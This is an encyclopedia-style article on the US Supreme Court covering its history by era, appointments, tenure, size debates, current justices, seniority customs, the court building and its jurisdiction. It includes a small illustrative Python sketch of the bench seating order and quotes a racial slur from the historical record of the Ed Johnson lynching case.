Justices were required to "ride circuit" and hold circuit court twice a year in their assigned judicial district. 7 Immediately after signing the act into law, President George Washington nominated the following people to serve on the court: John Jay for chief justice and John Rutledge, William Cushing, Robert H. Harrison, James Wilson, and John Blair Jr. as associate justices. All six were confirmed by the Senate on September 26, 1789; however, Harrison declined to serve, and Washington later nominated James Iredell in his place. 8 The Supreme Court held its inaugural session from February 2 through February 10, 1790, at the Royal Exchange in New York City, then the U.S. capital. 9 A second session was held there in August 1790. 10 The earliest sessions of the court were devoted to organizational proceedings, as the first cases did not reach it until 1791. 7 When the nation's capital was moved to Philadelphia in 1790, the Supreme Court did so as well. After initially meeting at Independence Hall, the court established its chambers at City Hall. 11 Under chief justices Jay, Rutledge, and Ellsworth (1789–1801), the court heard few cases; its first decision was West v. Barnes (1791), a case involving procedure. 12 As the court initially had only six members, every decision that it made by a majority was also made by two-thirds (voting four to two). 13 However, Congress has always allowed less than the court's full membership to make decisions, starting with a quorum of four justices in 1789. 14 The court lacked a home of its own and had little prestige, 15 a situation not helped by the era's highest-profile case, Chisholm v. Georgia (1793), which was reversed within two years by the adoption of the Eleventh Amendment. 16 The court's power and prestige grew substantially during the Marshall Court (1801–1835). 17 Under Marshall, the court established the power of judicial review over acts of Congress, 18 including specifying itself as the supreme expositor of the Constitution (Marbury v. Madison) 19 20 and making several important constitutional rulings that gave shape and substance to the balance of power between the federal government and states, notably Martin v. Hunter's Lessee, McCulloch v. Maryland, and Gibbons v. Ogden. 21 22 23 24 The Marshall Court also ended the practice of each justice issuing his opinion seriatim, 25 a remnant of British tradition, 26 and instead issuing a single majority opinion. 25 Also during Marshall's tenure, although beyond the court's control, the impeachment and acquittal of Justice Samuel Chase from 1804 to 1805 helped cement the principle of judicial independence. 27 28 The Taney Court (1836–1864) made several important rulings, such as Sheldon v. Sill, which held that while Congress may not limit the subjects the Supreme Court may hear, it may limit the jurisdiction of the lower federal courts to prevent them from hearing cases dealing with certain subjects. 29 Nevertheless, it is primarily remembered for its ruling in Dred Scott v. Sandford, 30 which helped precipitate the American Civil War. 31 In the Reconstruction era, the Chase, Waite, and Fuller Courts (1864–1910) interpreted the new Civil War amendments to the Constitution 24 and developed the doctrine of substantive due process (Lochner v. New York; 32 Adair v. United States). 33 The size of the court was last changed in 1869, when it was set at nine. 
Under the White and Taft Courts (1910–1930), the court held that the Fourteenth Amendment had incorporated some guarantees of the Bill of Rights against the states (Gitlow v. New York), 34 grappled with the new antitrust statutes (Standard Oil Co. of New Jersey v. United States), upheld the constitutionality of military conscription (Selective Draft Law Cases), 35 and brought the substantive due process doctrine to its first apogee (Adkins v. Children's Hospital). 36 During the Hughes, Stone, and Vinson courts (1930–1953), the court gained its own accommodation in 1935 37 and changed its interpretation of the Constitution, giving a broader reading to the powers of the federal government to facilitate President Franklin D. Roosevelt's New Deal (most prominently West Coast Hotel Co. v. Parrish, Wickard v. Filburn, United States v. Darby, and United States v. Butler). 38 39 40 During World War II, the court continued to favor government power, upholding the internment of Japanese Americans (Korematsu v. United States) and the mandatory Pledge of Allegiance (Minersville School District v. Gobitis). Nevertheless, Gobitis was soon repudiated (West Virginia State Board of Education v. Barnette), and the Steel Seizure Case restricted the pro-government trend. The Warren Court (1953–1969) dramatically expanded the force of Constitutional civil liberties. 41 It held that segregation in public schools violates the Equal Protection Clause of the Fourteenth Amendment (Brown v. Board of Education, Bolling v. Sharpe, and Green v. County School Bd.) 42 and that legislative districts must be roughly equal in population (Reynolds v. Sims). It recognized a general right to privacy (Griswold v. Connecticut), 43 limited the role of religion in public school, most prominently Engel v. Vitale and Abington School District v. Schempp, 44 45 incorporated most guarantees of the Bill of Rights against the states, prominently Mapp v. Ohio (the exclusionary rule) and Gideon v. Wainwright (right to appointed counsel), 46 47 and required that criminal suspects be apprised of all these rights by police (Miranda v. Arizona). 48 At the same time, the court limited defamation suits by public figures (New York Times Co. v. Sullivan) and supplied the government with an unbroken run of antitrust victories. 49 The Burger Court (1969–1986) saw a conservative shift. 50 It also expanded Griswold's right to privacy to strike down abortion laws (Roe v. Wade) 51 but divided deeply on affirmative action (Regents of the University of California v. Bakke) 52 and campaign finance regulation (Buckley v. Valeo). 53 It also wavered on the death penalty, ruling first that most applications were defective (Furman v. Georgia), 54 but later that the death penalty itself was not unconstitutional (Gregg v. Georgia). 54 55 56 The Rehnquist Court (1986–2005) was known for its revival of judicial enforcement of federalism, 57 emphasizing the limits of the Constitution's affirmative grants of power (United States v. Lopez) and the force of its restrictions on those powers (Seminole Tribe v. Florida, City of Boerne v. Flores). 58 59 60 61 62 It struck down single-sex state schools as a violation of equal protection (United States v. Virginia), laws against sodomy as violations of substantive due process (Lawrence v. Texas) 63 and the line-item veto (Clinton v. New York) but upheld school vouchers (Zelman v. Simmons-Harris) and reaffirmed Roe's restrictions on abortion laws (Planned Parenthood v. Casey). 64 The court's decision in Bush v. 
Gore, which ended the electoral recount during the 2000 United States presidential election, remains especially controversial, with debate ongoing over the rightful winner and whether the ruling should set a precedent. 65 66 67 68 The Roberts Court (2005–present) is regarded as more conservative and controversial than the Rehnquist Court. 69 70 71 72 Some of its major rulings have concerned federal preemption (Wyeth v. Levine), civil procedure (Twombly and Iqbal), voting rights and federal preclearance (Shelby County), abortion (Gonzales v. Carhart and Dobbs v. Jackson Women's Health Organization), 73 climate change (Massachusetts v. EPA), same-sex marriage (United States v. Windsor and Obergefell v. Hodges), and the Bill of Rights, such as in Citizens United v. Federal Election Commission (First Amendment), 74 Heller, McDonald, and Bruen (Second Amendment), 75 and Baze v. Rees (Eighth Amendment). 76 77 Article II, Section 2, Clause 2 of the United States Constitution, known as the Appointments Clause, empowers the president to nominate and, with the confirmation (advice and consent) of the United States Senate, to appoint public officials, including justices of the Supreme Court. This clause is one example of the system of checks and balances inherent in the Constitution. The president has the plenary power to nominate, while the Senate possesses the plenary power to reject or confirm the nominee. The Constitution sets no qualifications for service as a justice, such as age, citizenship, residence or prior judicial experience; thus a president may nominate anyone to serve, and the Senate may not set any qualifications or otherwise limit who the president can choose. 78 79 80 In modern times, the confirmation process has attracted considerable attention from the press and advocacy groups, which lobby senators to confirm or to reject a nominee depending on whether their track record aligns with the group's views. The Senate Judiciary Committee conducts hearings and votes on whether the nomination should go to the full Senate with a positive, negative or neutral report. The committee's practice of personally interviewing nominees is relatively recent. The first nominee to appear before the committee was Harlan Fiske Stone, in 1925, who sought to quell concerns about his links to Wall Street, and the modern practice of questioning began with John Marshall Harlan II in 1955. 81 Once the committee reports out the nomination, the full Senate considers it. Rejections are relatively uncommon; the Senate has explicitly rejected twelve Supreme Court nominees, most recently Robert Bork, nominated by President Ronald Reagan in 1987. Although Senate rules do not necessarily allow a negative or tied vote in committee to block a nomination, prior to 2017 a nomination could be blocked by filibuster once debate had begun in the full Senate. President Lyndon B. Johnson's nomination of sitting associate justice Abe Fortas to succeed Earl Warren as Chief Justice in 1968 was the first successful filibuster of a Supreme Court nominee; it included both Republican and Democratic senators concerned about Fortas's ethics. President Donald Trump's nomination of Neil Gorsuch to the seat left vacant by Antonin Scalia's death was the second.
Unlike the Fortas filibuster, only Democratic senators voted against cloture on the Gorsuch nomination, citing his perceived conservative judicial philosophy, and the Republican majority's prior refusal to take up President Barack Obama's nomination of Merrick Garland to fill the vacancy. 82 This led the Republican majority to change the rules and eliminate the filibuster for Supreme Court nominations. 83 Not every Supreme Court nominee has received a floor vote in the Senate. A president may withdraw a nomination before an actual confirmation vote occurs, typically because it is clear that the Senate will reject the nominee; this occurred with President George W. Bush's nomination of Harriet Miers in 2005. The Senate may also fail to act on a nomination, which expires at the end of the session. President Dwight Eisenhower's first nomination of John Marshall Harlan II in November 1954 was not acted on by the Senate; Eisenhower re-nominated Harlan in January 1955, and Harlan was confirmed two months later. Most recently, the Senate failed to act on the March 2016 nomination of Merrick Garland, as the nomination expired in January 2017, and the vacancy was filled by Neil Gorsuch, an appointee of President Trump. 84 Once the Senate confirms a nomination, the president must prepare and sign a commission, to which the Seal of the Department of Justice must be affixed, before the appointee can take office. 85 The seniority of an associate justice is based on the commissioning date, not the confirmation or swearing-in date. 86 After receiving their commission, the appointee must then take the two prescribed oaths before assuming their official duties. 87 The importance of the oath taking is underscored by the case of Edwin M. Stanton. Although confirmed by the Senate on December 20, 1869, and duly commissioned as an associate justice by President Ulysses S. Grant, Stanton died on December 24, prior to taking the prescribed oaths. He is not, therefore, considered to have been a member of the court. 88 89 Before 1981, the approval process of justices was usually rapid. From the Truman through Nixon administrations, justices were typically approved within one month. From the Reagan administration to the present, the process has taken much longer and some believe this is because Congress sees justices as playing a more political role than in the past. 90 According to the Congressional Research Service, the average number of days from nomination to final Senate vote since 1975 is 67 days (2.2 months), while the median is 71 days (2.3 months). 91 92 When the Senate is in recess, a president may make temporary appointments to fill vacancies. Recess appointees hold office only until the end of the next Senate session (less than two years). The Senate must confirm the nominee for them to continue serving; of the two chief justices and eleven associate justices who have received recess appointments, only Chief Justice John Rutledge was not subsequently confirmed. 93 No U.S. president since Dwight D. Eisenhower has made a recess appointment to the court, and the practice has become rare and controversial even in lower federal courts. 94 In 1960, after Eisenhower had made three such appointments, the Senate passed a "sense of the Senate" resolution that recess appointments to the court should only be made in "unusual circumstances"; 95 such resolutions are not legally binding but are an expression of Congress's views in the hope of guiding executive action. 
95 96 The Supreme Court's 2014 decision in National Labor Relations Board v. Noel Canning limited the ability of the president to make recess appointments (including appointments to the Supreme Court); the court ruled that the Senate decides when the Senate is in session or in recess. Writing for the court, Justice Breyer stated, "We hold that, for purposes of the Recess Appointments Clause, the Senate is in session when it says it is, provided that, under its own rules, it retains the capacity to transact Senate business." 97 This ruling allows the Senate to prevent recess appointments through the use of pro-forma sessions. 98 Among democratic nations, lifetime tenure for high-court judges exists only for US Supreme Court justices and the justices of the Supreme Court of Rhode Island; all other democratic nations and all other US states have set term limits or mandatory retirement ages. 99 Larry Sabato wrote: "The insularity of lifetime tenure, combined with the appointments of relatively young attorneys who give long service on the bench, produces senior judges representing the views of past generations better than views of the current day." 100 Sanford Levinson has been critical of justices who stayed in office despite medical deterioration, relying on their longevity. 101 James MacGregor Burns stated lifelong tenure has "produced a critical time lag, with the Supreme Court institutionally almost always behind the times." 102 Proposals to solve these problems include term limits for justices, as proposed by Levinson 103 and Sabato, 100 104 and a mandatory retirement age proposed by Richard Epstein, 105 among others. 106 Alexander Hamilton in Federalist 78 argued that one benefit of lifetime tenure was that "nothing can contribute so much to its firmness and independence as permanency in office." 107 Article Three, Section 1 of the Constitution provides that justices "shall hold their offices during good behavior", which is understood to mean that they may serve for the remainder of their lives, until death; furthermore, the phrase is generally interpreted to mean that the only way justices can be removed from office is by Congress via the impeachment process. The Framers of the Constitution chose good behavior tenure to limit the power to remove justices and to ensure judicial independence. 108 109 110 No constitutional mechanism exists for removing a justice who is permanently incapacitated by illness or injury and unable (or unwilling) to resign. 111 The only justice ever to be impeached was Samuel Chase, in 1804. The House of Representatives adopted eight articles of impeachment against him; however, he was acquitted by the Senate, and remained in office until his death in 1811. 112 Two justices, William O. Douglas and Abe Fortas, were subjected to hearings by the Judiciary Committee: Douglas was the subject of hearings twice, in 1953 and again in 1970, while Fortas resigned in 1969 as hearings were being organized. On July 10, 2024, Representative Alexandria Ocasio-Cortez filed Articles of Impeachment against justices Clarence Thomas and Samuel Alito, citing their "widely documented financial and personal entanglements." 113 Because justices have indefinite tenure, the timing of vacancies can be unpredictable. Sometimes they arise in quick succession, as in September 1971, when Hugo Black and John Marshall Harlan II left within days of each other, the shortest period of time between vacancies in the court's history.
114 Sometimes a great length of time passes between vacancies, such as the 11 year span, from 1994 to 2005, from the retirement of Harry Blackmun to the death of William Rehnquist, which was the second longest timespan between vacancies in the court's history. 115 On average a new justice joins the court about every two years. 116 Despite the variability, all but four presidents have been able to appoint at least one justice. William Henry Harrison died a month after taking office, although his successor (John Tyler) made an appointment during that presidential term. Likewise, Zachary Taylor died 16 months after taking office, but his successor (Millard Fillmore) also made a Supreme Court nomination before the end of that term. Andrew Johnson, who became president after the assassination of Abraham Lincoln, was denied the opportunity to appoint a justice by a reduction in the size of the court. Jimmy Carter is the only person elected president to have left office after at least one full term without having the opportunity to appoint a justice. Presidents James Monroe, Franklin D. Roosevelt, and George W. Bush each served a full term without an opportunity to appoint a justice, but made appointments during their subsequent terms in office. No president who has served more than one full term has gone without at least one opportunity to make an appointment. One of the smallest Supreme Courts in the world, the US Supreme Court consists of nine members: one chief justice and eight associate justices. The U.S. Constitution does not specify the size of the Supreme Court, nor does it specify any specific positions for the court's members. The Constitution assumes the existence of the office of the chief justice, because it mentions in Article I, Section 3, Clause 6 that "the Chief Justice" must preside over impeachment trials of the President of the United States. The power to define the Supreme Court's size and membership has been assumed to belong to Congress, which initially established a six-member Supreme Court composed of a chief justice and five associate justices through the Judiciary Act of 1789. The size of the court was first altered by the Midnight Judges Act of 1801 which would have reduced the size of the court to five members upon its next vacancy (as federal judges have life tenure), but the Judiciary Act of 1802 promptly negated the 1801 act, restoring the court's size to six members before any such vacancy occurred. As the nation's boundaries grew across the continent and as Supreme Court justices in those days had to ride the circuit, an arduous process requiring long travel on horseback or carriage over harsh terrain that resulted in months-long extended stays away from home, Congress added justices to correspond with the growth such that the number of seats for associate justices plus the chief justice became seven in 1807, nine in 1837, and ten in 1863. 117 118 At the behest of Chief Justice Chase, and in an attempt by the Republican Congress to limit the power of Democrat Andrew Johnson, Congress passed the Judicial Circuits Act of 1866, providing that the next three justices to retire would not be replaced, which would thin the bench to seven justices by attrition. Consequently, one seat was removed in 1866 and a second in 1867. Soon after Johnson left office, the new president Ulysses S. Grant, 119 a Republican, signed into law the Judiciary Act of 1869. 
This returned the number of justices to nine 120 (where it has since remained), and allowed Grant to immediately appoint two more judges. President Franklin D. Roosevelt attempted to expand the court in 1937. His proposal envisioned the appointment of one additional justice for each incumbent justice who reached the age of 70 years 6 months and refused retirement, up to a maximum bench of 15 justices. The proposal was ostensibly to ease the burden of the docket on elderly judges, but the actual purpose was widely understood as an effort to "pack" the court with justices who would support Roosevelt's New Deal. 121 The plan, usually called the "court-packing plan", failed in Congress after members of Roosevelt's own Democratic Party believed it to be unconstitutional. It was defeated 70–20 in the Senate, and the Senate Judiciary Committee reported that it was "essential to the continuance of our constitutional democracy" that the proposal "be so emphatically rejected that its parallel will never again be presented to the free representatives of the free people of America." 122 123 124 125 The expansion of a 5–4 conservative majority to a 6–3 supermajority during the presidency of Donald Trump led analysts to call the court the most conservative since the 1930s, as well as prompting calls for an expansion in the court's size to fix what some saw as an imbalance, with Republicans having appointed 14 of the 18 justices immediately preceding Amy Coney Barrett. 126 127 In April 2021, during the 117th Congress, some Democrats in the House of Representatives introduced the Judiciary Act of 2021, a bill to expand the Supreme Court from nine to 13 seats. It met divided views within the party, and Speaker of the House Nancy Pelosi did not bring it to the floor for a vote. 128 129 Shortly after taking office in January 2021, President Joe Biden established a presidential commission to study possible reforms to the Supreme Court. The commission's December 2021 final report discussed but took no position on expanding the size of the court. 130 At nine members, the U.S. Supreme Court is one of the smallest supreme courts in the world. David Litt argues the court is too small to represent the perspectives of a country the United States' size. 131 Lawyer and legal scholar Jonathan Turley advocates for 19 justices, with the court being gradually expanded by two new members per presidential term, bringing the U.S. Supreme Court to a similar size as its counterparts in other developed countries. He says that a bigger court would reduce the power of the swing justice, ensure the court has "a greater diversity of views", and make confirmation of new justices less politically contentious. 132 133 There are currently nine justices on the Supreme Court: Chief Justice John Roberts and eight associate justices. Among the current members of the court, Clarence Thomas is the longest-serving justice, with a tenure of 11,987 days (32 years, 299 days) as of August 17, 2024; the most recent justice to join the court is Ketanji Brown Jackson, whose tenure began on June 30, 2022, after being confirmed by the Senate on April 7. 134 A graphical timeline (not reproduced here) depicts the length of each current justice's tenure on the court; tenure is distinct from seniority, as the chief justice has seniority over all associate justices regardless of tenure. The court currently has five male and four female justices. Among the nine justices, there are two African American justices (Justices Thomas and Jackson) and one Hispanic justice (Justice Sotomayor).
One of the justices was born to at least one immigrant parent: Justice Alito's father was born in Italy. 136 137 At least six justices are Roman Catholics, one is Jewish, and one is Protestant. It is unclear whether Neil Gorsuch considers himself a Catholic or an Episcopalian. 138 Historically, most justices have been Protestants, including 36 Episcopalians, 19 Presbyterians, 10 Unitarians, 5 Methodists, and 3 Baptists. 139 140 The first Catholic justice was Roger Taney in 1836, 141 and 1916 saw the appointment of the first Jewish justice, Louis Brandeis. 142 In recent years the historical situation has reversed, as most recent justices have been either Catholic or Jewish. Three justices are from the state of New York, two are from Washington, D.C., and one each is from New Jersey, Georgia, Colorado, and Louisiana. 143 144 145 Eight of the current justices received their Juris Doctor from an Ivy League law school: Neil Gorsuch, Ketanji Brown Jackson, Elena Kagan and John Roberts from Harvard; plus Samuel Alito, Brett Kavanaugh, Sonia Sotomayor and Clarence Thomas from Yale. Only Amy Coney Barrett did not; she received her Juris Doctor at Notre Dame. For much of the court's history, every justice was a man of Northwestern European descent, and almost always Protestant. Diversity concerns focused on geography, to represent all regions of the country, rather than religious, ethnic, or gender diversity. 146 Racial, ethnic, and gender diversity in the court increased in the late 20th century. Thurgood Marshall became the first African-American justice in 1967. 142 Sandra Day O'Connor became the first female justice in 1981. 142 In 1986, Antonin Scalia became the first Italian-American justice. Marshall was succeeded by African-American Clarence Thomas in 1991. 147 O'Connor was joined by Ruth Bader Ginsburg, the first Jewish woman on the Court, in 1993. 148 After O'Connor's retirement, Ginsburg was joined in 2009 by Sonia Sotomayor, the first Hispanic and Latina justice, 142 and in 2010 by Elena Kagan. 148 After Ginsburg's death on September 18, 2020, Amy Coney Barrett was confirmed as the fifth woman in the court's history on October 26, 2020. Ketanji Brown Jackson is the sixth woman and first African-American woman on the court. There have been six foreign-born justices in the court's history: James Wilson (1789–1798), born in Caskardy, Scotland; James Iredell (1790–1799), born in Lewes, England; William Paterson (1793–1806), born in County Antrim, Ireland; David Brewer (1889–1910), born to American missionaries in Smyrna, Ottoman Empire (now İzmir, Turkey); George Sutherland (1922–1939), born in Buckinghamshire, England; and Felix Frankfurter (1939–1962), born in Vienna, Austria-Hungary (now in Austria). 142 Since 1789, about one-third of the justices have been U.S. military veterans. Samuel Alito is the only veteran currently serving on the court. 149 Retired justices Stephen Breyer and Anthony Kennedy also served in the U.S. military. 150 Justices are nominated by the sitting president and confirmed by the Senate, and historically have held many of the views of the nominating president's political party.
While justices do not represent or receive official endorsements from political parties, as is accepted practice in the legislative and executive branches, organizations such as the Federalist Society do officially filter and endorse judges that have a sufficiently conservative view of the law. Jurists are often informally categorized in the media as conservative or liberal. Attempts to quantify the ideologies of jurists include the Segal–Cover score, Martin–Quinn score, and Judicial Common Space score. 151 152 Devins and Baum argue that before 2010, the Court never had clear ideological blocs that fell perfectly along party lines. In choosing their appointments, Presidents often focused more on friendship and political connections than on ideology. Republican presidents sometimes appointed liberals and Democratic presidents sometimes appointed conservatives. As a result, "... between 1790 and early 2010 there were only two decisions that the Guide to the U.S. Supreme Court designated as important and that had at least two dissenting votes in which the Justices divided along party lines, about one-half of one percent." 153: 316 154 Even in the turbulent 1960s and 1970s, Democratic and Republican elites tended to agree on some major issues, especially concerning civil rights and civil liberties—and so did the justices. But since 1991, they argue, ideology has been much more important in choosing justices—all Republican appointees have been committed conservatives and all Democratic appointees have been liberals. 153: 331–344 As the more moderate Republican justices retired, the court has become more partisan, dividing more sharply along partisan lines, with justices appointed by Republican presidents taking increasingly conservative positions and those appointed by Democrats taking moderately liberal positions. 153: 357 Following the confirmation of Amy Coney Barrett in 2020 after the death of Ruth Bader Ginsburg, the court is composed of six justices appointed by Republican presidents and three appointed by Democratic presidents. It is popularly accepted that Chief Justice Roberts and associate justices Thomas, Alito, Gorsuch, Kavanaugh, and Barrett, appointed by Republican presidents, compose the court's conservative wing, and that Justices Sotomayor, Kagan, and Jackson, appointed by Democratic presidents, compose the court's liberal wing. 155 Prior to Justice Ginsburg's death in 2020, the conservative Chief Justice Roberts was sometimes described as the court's 'median justice' (with four justices more liberal and four more conservative than he is). 156 157 Darragh Roche argues that Kavanaugh as 2021's median justice exemplifies the rightward shift in the court. 158 FiveThirtyEight found the number of unanimous decisions dropped from the 20-year average of nearly 50% to nearly 30% in 2021, while party-line rulings increased from a 60-year average just above zero to a record-high 21%. 159 That year, Ryan Williams pointed to the party-line votes for confirmations of justices as evidence that the court is of partisan importance to the Senate. 160 In 2022, Simon Lazarus of Brookings critiqued the U.S. Supreme Court as an increasingly partisan institution. 161 A 2024 AP-NORC poll showed 7 in 10 respondents believed the court decides cases to "fit their own ideologies" as opposed to "acting as an independent check on other branches of government by being fair and impartial."
162 There are currently three living retired justices of the Supreme Court of the United States: Anthony Kennedy, David Souter, and Stephen Breyer. As retired justices, they no longer participate in the work of the Supreme Court, but may be designated for temporary assignments to sit on lower federal courts, usually the United States Courts of Appeals. Such assignments are formally made by the chief justice, on request of the chief judge of the lower court and with the consent of the retired justice. In recent years, Justice Souter has frequently sat on the First Circuit, the court of which he was briefly a member before joining the Supreme Court. 163 The status of a retired justice is analogous to that of a circuit or district court judge who has taken senior status, and eligibility of a Supreme Court justice to assume retired status (rather than simply resign from the bench) is governed by the same age and service criteria. In recent times, justices tend to strategically plan their decisions to leave the bench with personal, institutional, ideological, partisan, and political factors playing a role. 164 165 The fear of mental decline and death often motivates justices to step down. The desire to maximize the court's strength and legitimacy through one retirement at a time, when the court is in recess and during non-presidential election years suggests a concern for institutional health. Finally, especially in recent decades, many justices have timed their departure to coincide with a philosophically compatible president holding office, to ensure that a like-minded successor would be appointed. 166 167 As of 2024, associate justices receive a yearly salary of $298,500 and the chief justice is paid $312,200 per year. 168 Once a justice meets age and service requirements, the justice may retire with a pension based on the same formula used for federal employees. As with other federal courts judges, their pension can never be less than their salary at the time of retirement according to the Compensation Clause of Article III of the Constitution. citation needed For the most part, the day-to-day activities of the justices are governed by rules of protocol based upon the seniority of justices. The chief justice always ranks first in the order of precedence—regardless of the length of their service. The associate justices are then ranked by the length of their service. The chief justice sits in the center on the bench, or at the head of the table during conferences. The other justices are seated in order of seniority. The senior-most associate justice sits immediately to the chief justice's right; the second most senior sits immediately to their left. The seats alternate right to left in order of seniority, with the most junior justice occupying the last seat. Therefore, since the October 2022 term, the court sits as follows from left to right, from the perspective of those facing the court: Barrett, Gorsuch, Sotomayor, Thomas (most senior associate justice), Roberts (chief justice), Alito, Kagan, Kavanaugh, and Jackson. Likewise, when the members of the court gather for official group photographs, justices are arranged in order of seniority, with the five most senior members seated in the front row in the same order as they would sit during Court sessions (currently, from left to right, Sotomayor, Thomas, Roberts, Alito, and Kagan), and the four most junior justices standing behind them, again in the same order as they would sit during Court sessions (Barrett, Gorsuch, Kavanaugh, and Jackson). 
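The alternating-by-seniority seating rule described above can be expressed as a short Python sketch in the style of the rest of this notebook. This is illustrative only and not part of the scraped article: the function name bench_order and the hard-coded list of names are assumptions for the example, and the ordering shown simply reflects the October 2022 term as stated in the text.
import math
# Illustrative sketch (not from the article): reproduces the bench seating rule
# described above -- chief justice in the center, most senior associate to the
# chief's right (the audience's left), remaining seats alternating right/left
# by seniority, with the most junior justice in the last seat.
def bench_order(chief, associates_by_seniority):
    n = len(associates_by_seniority)
    seats = [None] * (n + 1)
    center = n // 2  # middle seat for the current nine-member court
    seats[center] = chief
    for rank, justice in enumerate(associates_by_seniority, start=1):
        offset = math.ceil(rank / 2)
        if rank % 2 == 1:
            seats[center - offset] = justice  # odd ranks sit to the chief's right
        else:
            seats[center + offset] = justice  # even ranks sit to the chief's left
    return seats
# Seniority order of the associate justices as of the October 2022 term (from the text)
associates = ["Thomas", "Alito", "Sotomayor", "Kagan",
              "Gorsuch", "Kavanaugh", "Barrett", "Jackson"]
print(bench_order("Roberts", associates))
# ['Barrett', 'Gorsuch', 'Sotomayor', 'Thomas', 'Roberts',
#  'Alito', 'Kagan', 'Kavanaugh', 'Jackson']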
In the justices' private conferences, current practice is for them to speak and vote in order of seniority, beginning with the chief justice first and ending with the most junior associate justice. By custom, the most junior associate justice in these conferences is charged with any menial tasks the justices may require as they convene alone, such as answering the door of their conference room, serving beverages and transmitting orders of the court to the clerk. 169 The Supreme Court first met on February 1, 1790, at the Merchants' Exchange Building in New York City. When Philadelphia became the capital, the court met briefly in Independence Hall before settling in Old City Hall from 1791 until 1800. After the government moved to Washington, D.C., the court occupied various spaces in the Capitol building until 1935, when it moved into its own purpose-built home. The four-story building was designed by Cass Gilbert in a classical style sympathetic to the surrounding buildings of the Capitol and Library of Congress, and is clad in marble. The building includes the courtroom, justices' chambers, an extensive law library, various meeting spaces, and auxiliary services including a gymnasium. The Supreme Court building is within the ambit of the Architect of the Capitol, but maintains its own Supreme Court Police, separate from the Capitol Police. 170 Located across First Street from the United States Capitol at One First Street NE and Maryland Avenue, 171 172 the building is open to the public from 9 am to 4:30 pm weekdays but closed on weekends and holidays. 171 Visitors may not tour the actual courtroom unaccompanied. There is a cafeteria, a gift shop, exhibits, and a half-hour informational film. 170 When the court is not in session, lectures about the courtroom are held hourly from 9:30 am to 3:30 pm and reservations are not necessary. 170 When the court is in session the public may attend oral arguments, which are held twice each morning (and sometimes afternoons) on Mondays, Tuesdays, and Wednesdays in two-week intervals from October through late April, with breaks during December and February. Visitors are seated on a first-come first-served basis. One estimate is there are about 250 seats available. 173 The number of open seats varies from case to case; for important cases, some visitors arrive the day before and wait through the night. The court releases opinions beginning at 10 am on scheduled "non-argument days" (also called opinion days) 174 These sessions, which typically last 15 to 30 minute, are also open to the public. 174 170 From mid-May until the end of June, at least one opinion day is scheduled each week. 170 Supreme Court Police are available to answer questions. 171 Congress is authorized by Article III of the federal Constitution to regulate the Supreme Court's appellate jurisdiction. The Supreme Court has original and exclusive jurisdiction over cases between two or more states 175 but may decline to hear such cases. 176 It also possesses original but not exclusive jurisdiction to hear "all actions or proceedings to which ambassadors, other public ministers, consuls, or vice consuls of foreign states are parties; all controversies between the United States and a State; and all actions or proceedings by a State against the citizens of another State or against aliens. 177 In 1906, the court asserted its original jurisdiction to prosecute individuals for contempt of court in United States v. Shipp. 
178 The resulting proceeding remains the only contempt proceeding and only criminal trial in the court's history. 179 180 The contempt proceeding arose from the lynching of Ed Johnson in Chattanooga, Tennessee the evening after Justice John Marshall Harlan granted Johnson a stay of execution to allow his lawyers to file an appeal. Johnson was removed from his jail cell by a lynch mob, aided by the local sheriff who left the prison virtually unguarded, and hanged from a bridge, after which a deputy sheriff pinned a note on Johnson's body reading: "To Justice Harlan. Come get your nigger now. 179 The local sheriff, John Shipp, cited the Supreme Court's intervention as the rationale for the lynching. The court appointed its deputy clerk as special master to preside over the trial in Chattanooga with closing arguments made in Washington before the Supreme Court justices, who found nine individuals guilty of contempt, sentencing three to 90 days in jail and the rest to 60 days in jail. 179 180 181 In all other cases, the court has only appellate jurisdiction, including the ability to issue writs of mandamus and writs of prohibition to lower courts. It considers cases based on its original jurisdiction very rarely; almost all cases are brought to the Supreme Court on appeal. In practice, the only original jurisdiction cases heard by the court are disputes between two or more states. 182 The court's appellate jurisdiction consists of appeals from federal courts of appeal (through certiorari, certiorari before judgment, and certified questions), 183 the United States Court of Appeals for the Armed Forces (through certiorari), 184 the Supreme Court of Puerto Rico (through certiorari), 185 the Supreme Court of the Virgin Islands (through certiorari), 186 the District of Columbia Court of Appeals (through certiorari), 187 and "final judgments or decrees rendered by the highest court of a State in which a decision could be had" (through certiorari). 187 In the last case, an appeal may be made to the Supreme Court from a lower state court if the state's highest court declined to hear an appeal or lacks jurisdiction to hear an appeal. For example, a decision rendered by one of the Florida District Courts of Appeal can be appealed to the U.S. Supreme Court if (a) the Supreme Court of Florida declined to grant certiorari, e.g. Florida Star v. B. J. F., or (b) the district court of appeal issued a per curiam decision simply affirming the lower court's decision without discussing the merits of the case, since the Supreme Court of Florida lacks jurisdiction to hear appeals of such decisions. 188 The power of the Supreme Court to consider appeals from state courts, rather than just federal courts, was created by the Judiciary Act of 1789 and upheld early in the court's history, by its rulings in Martin v. Hunter's Lessee (1816) and Cohens v. Virginia (1821). The Supreme Court is the only federal court that has jurisdiction over direct appeals from state court decisions, although there are several devices that permit so-called "collateral review" of state cases. It has to be noted that this "collateral review" often only applies to individuals on death row and not through the regular judicial system. 189 Since Article Three of the United States Constitution stipulates that federal courts may only entertain "cases" or "controversies", the Supreme Court cannot decide cases that are moot and it does not render advisory opinions, as the supreme courts of some states may do. For example, in DeFunis v. 
Odegaard (1974), the court dismissed a lawsuit challenging the constitutionality of a law school affirmative action policy because the plaintiff student had graduated since he began the lawsuit, and a decision from the court on his claim would not be able to redress any injury he had suffered. However, the court recognizes some circumstances where it is appropriate to hear a case that is seemingly moot. If an issue is "capable of repetition yet evading review", the court will address it even though the party before the court would not themselves be made whole by a favorable result. In Roe v. Wade (1973), and other abortion cases, the court addressed the merits of claims pressed by pregnant women seeking abortions even if they were no longer pregnant, because it takes longer than the typical human gestation period to appeal a case through the lower courts to the Supreme Court. Another mootness exception is voluntary cessation of unlawful conduct, in which the court considers the probability of recurrence and the plaintiff's need for relief. 190 The United States is divided into thirteen circuit courts of appeals, each of which is assigned a "circuit justice" from the Supreme Court. Although this concept has been in continuous existence throughout the history of the republic, its meaning has changed through time. Under the Judiciary Act of 1789, each justice was required to "ride circuit", or to travel within the assigned circuit and consider cases alongside local judges. This practice encountered opposition from many justices, who cited the difficulty of travel. Moreover, there was a potential for a conflict of interest on the court if a justice had previously decided the same case while riding circuit. Circuit riding ended in 1901, when the Circuit Court of Appeals Act was passed, and circuit riding was officially abolished by Congress in 1911. 191 The circuit justice for each circuit is responsible for dealing with certain types of applications that, by law and the rules of the court, may be addressed by a single justice. Ordinarily, a justice will resolve such an application by simply endorsing it "granted" or "denied" or entering a standard form of order; however, the justice may elect to write an opinion, referred to as an in-chambers opinion. Congress has specifically authorized one 